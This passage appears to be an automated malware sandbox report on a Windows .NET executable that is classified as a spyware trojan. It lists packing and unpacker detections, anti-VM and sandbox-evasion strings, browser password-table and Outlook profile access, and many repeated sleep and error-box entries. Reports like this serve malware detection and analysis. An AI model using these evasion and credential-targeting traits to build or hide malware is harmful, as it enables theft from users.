              Source: PI#53034601506400.exe, 00000000.00000002.345898074.0000000007340000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000002.344112204.0000000005A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTargetParameterCount.dll> vs PI#53034601506400.exe
              Source: PI#53034601506400.exe, 00000000.00000002.330109817.00000000025C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs PI#53034601506400.exe
              Source: PI#53034601506400.exeBinary or memory string: OriginalFilenamevPnb.exeD vs PI#53034601506400.exe
              Source: PI#53034601506400.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile read: C:\Users\user\Desktop\PI#53034601506400.exe:Zone.IdentifierJump to behavior
              Source: PI#53034601506400.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PI#53034601506400.exe "C:\Users\user\Desktop\PI#53034601506400.exe"
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess created: C:\Users\user\Desktop\PI#53034601506400.exe C:\Users\user\Desktop\PI#53034601506400.exe
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess created: C:\Users\user\Desktop\PI#53034601506400.exe C:\Users\user\Desktop\PI#53034601506400.exeJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI#53034601506400.exe.logJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
              Source: PI#53034601506400.exe, 00000001.00000003.324932752.0000000000D57000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: PI#53034601506400.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\PI#53034601506400.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
              Source: C:\Users\user\Desktop\PI#53034601506400.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: PI#53034601506400.exe, 00000000.00000003.313997229.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: is a registered trademark of Bigelow & Holmes Inc.slnt
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: PI#53034601506400.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PI#53034601506400.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: PI#53034601506400.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

              Data Obfuscation

              barindex
              Yara detected aPLib compressed binary
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTR
              .NET source code contains potential unpacker
              Source: PI#53034601506400.exe, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.PI#53034601506400.exe.a0000.0.unpack, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: PI#53034601506400.exeStatic PE information: 0x92744BED [Mon Nov 11 14:25:49 2047 UTC]
              Source: initial sampleStatic PE information: section name: .text entropy: 6.8711614725083345
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239871s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239639s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239532s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -239164s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238958s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238619s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -238106s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237991s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237842s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237688s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237561s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237427s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -237116s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236841s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236688s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236537s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236249s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236141s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -236000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235887s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235513s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235138s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -235028s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234905s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234777s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234657s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234530s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234418s >= -30000sJump to behavior
